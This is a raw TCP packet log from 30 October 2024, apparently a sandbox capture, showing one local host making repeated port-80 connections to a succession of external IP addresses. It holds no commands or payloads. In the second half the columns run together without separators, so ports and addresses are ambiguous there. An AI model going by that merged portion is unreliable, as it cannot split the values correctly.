Oct 30, 2024 04:56:39.337765932 CET | 80 | 49987 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:39.337861061 CET | 49987 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:39.350809097 CET | 49987 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:39.356076002 CET | 80 | 49987 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:40.787415981 CET | 80 | 49987 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:40.835616112 CET | 49987 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:40.866920948 CET | 49987 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:42.039563894 CET | 49988 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:42.044924021 CET | 80 | 49988 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:42.045015097 CET | 49988 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:42.058242083 CET | 49988 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:42.063508034 CET | 80 | 49988 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:43.473562956 CET | 80 | 49988 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:43.523160934 CET | 49988 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:43.570045948 CET | 49988 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:44.649171114 CET | 49989 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:44.654534101 CET | 80 | 49989 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:44.654596090 CET | 49989 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:44.713918924 CET | 49989 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:44.719247103 CET | 80 | 49989 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:44.719364882 CET | 80 | 49989 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:46.086023092 CET | 80 | 49989 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:46.132508039 CET | 49989 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:46.226303101 CET | 49989 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:47.323188066 CET | 49990 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:47.328556061 CET | 80 | 49990 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:47.328632116 CET | 49990 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:47.395813942 CET | 49990 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:47.401206017 CET | 80 | 49990 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:48.754000902 CET | 80 | 49990 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:48.804469109 CET | 49990 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:49.169655085 CET | 80 | 49990 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:49.169775963 CET | 49990 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:49.170531988 CET | 49990 | 80 | 192.168.2.5 | 18.141.10.107
Oct 30, 2024 04:56:49.175858974 CET | 80 | 49990 | 18.141.10.107 | 192.168.2.5
Oct 30, 2024 04:56:54.551820040 CET | 49991 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:56:54.557213068 CET | 80 | 49991 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:56:54.557298899 CET | 49991 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:56:54.567487001 CET | 49991 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:56:54.572848082 CET | 80 | 49991 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:56:56.070266962 CET | 49991 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:56:56.076488972 CET | 80 | 49991 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:56:56.076646090 CET | 49991 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:56:57.088360071 CET | 49992 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:56:57.093863964 CET | 80 | 49992 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:56:57.094063044 CET | 49992 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:56:57.103473902 CET | 49992 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:56:57.108933926 CET | 80 | 49992 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:56:58.617053032 CET | 49992 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:56:58.623337030 CET | 80 | 49992 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:56:58.623390913 CET | 49992 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:56:59.635180950 CET | 49993 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:56:59.640582085 CET | 80 | 49993 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:56:59.640713930 CET | 49993 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:56:59.650847912 CET | 49993 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:56:59.656316996 CET | 80 | 49993 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:56:59.656436920 CET | 80 | 49993 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:57:01.163830042 CET | 49993 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:57:01.171689034 CET | 80 | 49993 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:57:01.171751976 CET | 49993 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:57:02.182007074 CET | 49994 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:57:02.187417030 CET | 80 | 49994 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:57:02.187489986 CET | 49994 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:57:02.195517063 CET | 49994 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:57:02.200798988 CET | 80 | 49994 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:57:04.018161058 CET | 80 | 49994 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:57:04.070060015 CET | 49994 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:57:04.274209023 CET | 80 | 49994 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:57:04.274354935 CET | 49994 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:57:04.302396059 CET | 49994 | 80 | 192.168.2.5 | 197.189.237.186
Oct 30, 2024 04:57:04.307663918 CET | 80 | 49994 | 197.189.237.186 | 192.168.2.5
Oct 30, 2024 04:57:30.013282061 CET | 49995 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:30.018691063 CET | 80 | 49995 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:30.019443035 CET | 49995 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:30.031331062 CET | 49995 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:30.036748886 CET | 80 | 49995 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:30.704444885 CET | 80 | 49995 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:30.742775917 CET | 80 | 49995 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:30.742881060 CET | 49995 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:31.545391083 CET | 49995 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:32.568058968 CET | 49996 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:32.573496103 CET | 80 | 49996 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:32.573575020 CET | 49996 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:32.586517096 CET | 49996 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:32.591811895 CET | 80 | 49996 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:33.264122009 CET | 80 | 49996 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:33.301944017 CET | 80 | 49996 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:33.302020073 CET | 49996 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:34.101686954 CET | 49996 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:35.120580912 CET | 49997 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:35.126197100 CET | 80 | 49997 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:35.126296043 CET | 49997 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:35.137769938 CET | 49997 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:35.143155098 CET | 80 | 49997 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:35.143284082 CET | 80 | 49997 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:35.808804035 CET | 80 | 49997 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:35.848815918 CET | 80 | 49997 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:35.848987103 CET | 49997 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:36.648288012 CET | 49997 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:37.666440964 CET | 49998 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:37.672005892 CET | 80 | 49998 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:37.675338030 CET | 49998 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:37.681313992 CET | 49998 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:37.686646938 CET | 80 | 49998 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:38.351922989 CET | 80 | 49998 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:38.390337944 CET | 80 | 49998 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:38.392162085 CET | 49998 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:38.392162085 CET | 49998 | 80 | 192.168.2.5 | 162.0.238.246
Oct 30, 2024 04:57:38.397533894 CET | 80 | 49998 | 162.0.238.246 | 192.168.2.5
Oct 30, 2024 04:57:43.502350092 CET | 49999 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:43.508609056 CET | 80 | 49999 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:43.508702993 CET | 49999 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:43.523920059 CET | 49999 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:43.530623913 CET | 80 | 49999 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:44.516885042 CET | 80 | 49999 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:44.549869061 CET | 80 | 49999 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:44.553478956 CET | 49999 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:45.038911104 CET | 49999 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:46.063818932 CET | 50000 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:46.069379091 CET | 80 | 50000 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:46.072196960 CET | 50000 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:46.085351944 CET | 50000 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:46.090804100 CET | 80 | 50000 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:46.972646952 CET | 80 | 50000 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:47.023221016 CET | 50000 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:47.116174936 CET | 80 | 50000 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:47.116246939 CET | 50000 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:47.589335918 CET | 50000 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:48.604110003 CET | 50001 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:48.609644890 CET | 80 | 50001 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:48.609718084 CET | 50001 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:48.620018005 CET | 50001 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:48.626992941 CET | 80 | 50001 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:48.627595901 CET | 80 | 50001 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:49.496403933 CET | 80 | 50001 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:49.538844109 CET | 50001 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:49.642199039 CET | 80 | 50001 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:49.647375107 CET | 50001 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:50.135377884 CET | 50001 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:51.151309967 CET | 50002 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:51.156887054 CET | 80 | 50002 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:51.156961918 CET | 50002 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:51.164398909 CET | 50002 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:51.169748068 CET | 80 | 50002 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:52.067540884 CET | 80 | 50002 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:52.116985083 CET | 50002 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:52.224843025 CET | 80 | 50002 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:57:52.229460955 CET | 50002 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:52.232846022 CET | 50002 | 80 | 192.168.2.5 | 31.31.196.17
Oct 30, 2024 04:57:52.238178015 CET | 80 | 50002 | 31.31.196.17 | 192.168.2.5
Oct 30, 2024 04:58:05.323925018 CET | 50003 | 80 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 04:58:05.329283953 CET | 80 | 50003 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 04:58:05.329385042 CET | 50003 | 80 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 04:58:05.341459036 CET | 50003 | 80 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 04:58:05.346787930 CET | 80 | 50003 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 04:58:05.942195892 CET | 80 | 50003 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 04:58:05.944449902 CET | 80 | 50003 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 04:58:05.947427034 CET | 50003 | 80 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 04:58:06.851428986 CET | 50003 | 80 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 04:58:07.871531963 CET | 50004 | 80 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 04:58:07.877681971 CET | 80 | 50004 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 04:58:07.879715919 CET | 50004 | 80 | 192.168.2.5 | 188.114.97.3
                                                                    Oct 30, 2024 04:58:07.891411066 CET5000480192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:07.896822929 CET8050004188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:08.498311996 CET8050004188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:08.500215054 CET8050004188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:08.500508070 CET5000480192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:09.398452997 CET5000480192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:10.417388916 CET5000580192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:10.422900915 CET8050005188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:10.429440022 CET5000580192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:10.437376022 CET5000580192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:10.442739964 CET8050005188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:10.442791939 CET8050005188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:11.039511919 CET8050005188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:11.041147947 CET8050005188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:11.041197062 CET5000580192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:11.949383974 CET5000580192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:12.963777065 CET5000680192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:12.969557047 CET8050006188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:12.969649076 CET5000680192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:12.976897955 CET5000680192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:12.982367039 CET8050006188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:13.599725008 CET8050006188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:13.602442980 CET8050006188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:13.602539062 CET5000680192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:13.603656054 CET5000680192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:13.609029055 CET8050006188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:18.644764900 CET5000780192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:18.650343895 CET8050007206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:18.650428057 CET5000780192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:18.677511930 CET5000780192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:18.684583902 CET8050007206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:20.179645061 CET5000780192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:20.226443052 CET8050007206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:21.198506117 CET5000880192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:21.204509020 CET8050008206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:21.204592943 CET5000880192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:21.220747948 CET5000880192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:21.227560043 CET8050008206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:22.726433039 CET5000880192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:22.778428078 CET8050008206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:23.744930029 CET5000980192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:23.751777887 CET8050009206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:23.755717039 CET5000980192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:23.767502069 CET5000980192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:23.772854090 CET8050009206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:23.772989035 CET8050009206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:25.276554108 CET5000980192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:25.326297998 CET8050009206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:26.292176962 CET5001080192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:26.297641993 CET8050010206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:26.301459074 CET5001080192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:26.308629036 CET5001080192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:26.314086914 CET8050010206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:27.126734018 CET8050007206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:27.126796007 CET5000780192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:29.698677063 CET8050008206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:29.705426931 CET5000880192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:32.237359047 CET8050009206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:32.237485886 CET5000980192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:34.799021959 CET8050010206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:34.799141884 CET5001080192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:34.800029039 CET5001080192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:34.805387974 CET8050010206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:39.822788954 CET5001180192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:39.828150034 CET8050011162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:39.829498053 CET5001180192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:39.838634968 CET5001180192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:39.843945980 CET8050011162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:40.511739969 CET8050011162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:40.554521084 CET5001180192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:40.556612968 CET8050011162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:40.557532072 CET5001180192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:41.351602077 CET5001180192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:42.373440981 CET5001280192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:42.378916025 CET8050012162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:42.385438919 CET5001280192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:42.393445969 CET5001280192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:42.398813963 CET8050012162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:43.058919907 CET8050012162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:43.097259045 CET8050012162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:43.097311020 CET5001280192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:43.898330927 CET5001280192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:44.917773962 CET5001380192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:44.923258066 CET8050013162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:44.923353910 CET5001380192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:44.936626911 CET5001380192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:44.942107916 CET8050013162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:44.942162991 CET8050013162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:45.593148947 CET8050013162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:45.631355047 CET8050013162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:45.631525040 CET5001380192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:46.445462942 CET5001380192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:47.463598967 CET5001480192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:47.469018936 CET8050014162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:47.469240904 CET5001480192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:47.476031065 CET5001480192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:47.481417894 CET8050014162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:48.152520895 CET8050014162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:48.191457987 CET8050014162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:48.193548918 CET5001480192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:48.197447062 CET5001480192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:48.202753067 CET8050014162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:53.329448938 CET5001580192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:53.334841967 CET80500153.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:53.334933043 CET5001580192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:53.440233946 CET5001580192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:53.445584059 CET80500153.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:54.945251942 CET5001580192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:54.951348066 CET80500153.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:54.951405048 CET5001580192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:55.969785929 CET5001680192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:55.975277901 CET80500163.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:55.977524042 CET5001680192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:55.987848043 CET5001680192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:55.993267059 CET80500163.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:56.637590885 CET80500163.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:56.637692928 CET5001680192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:57.492084980 CET5001680192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:57.498244047 CET80500163.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:58.513492107 CET5001780192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:58.519031048 CET80500173.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:58.519171000 CET5001780192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:58.529898882 CET5001780192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:58.536231995 CET80500173.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:58.536263943 CET80500173.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:59.148858070 CET80500173.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:59.148940086 CET5001780192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:59:00.038995028 CET5001780192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:59:00.044667959 CET80500173.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:59:01.057956934 CET5001880192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:59:01.063673973 CET80500183.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:59:01.063745975 CET5001880192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:59:01.072371960 CET5001880192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:59:01.077713013 CET80500183.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:59:01.726975918 CET80500183.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:59:01.761677980 CET80500183.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:59:01.765592098 CET5001880192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:59:01.769469023 CET5001880192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:59:01.774820089 CET80500183.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:59:06.793076038 CET5001980192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:06.799179077 CET8050019144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:06.799249887 CET5001980192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:06.812457085 CET5001980192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:06.817784071 CET8050019144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:07.453797102 CET8050019144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:07.485095024 CET8050019144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:07.485162973 CET5001980192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:08.321487904 CET5001980192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:09.341130972 CET5002080192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:09.346685886 CET8050020144.34.186.85192.168.2.5
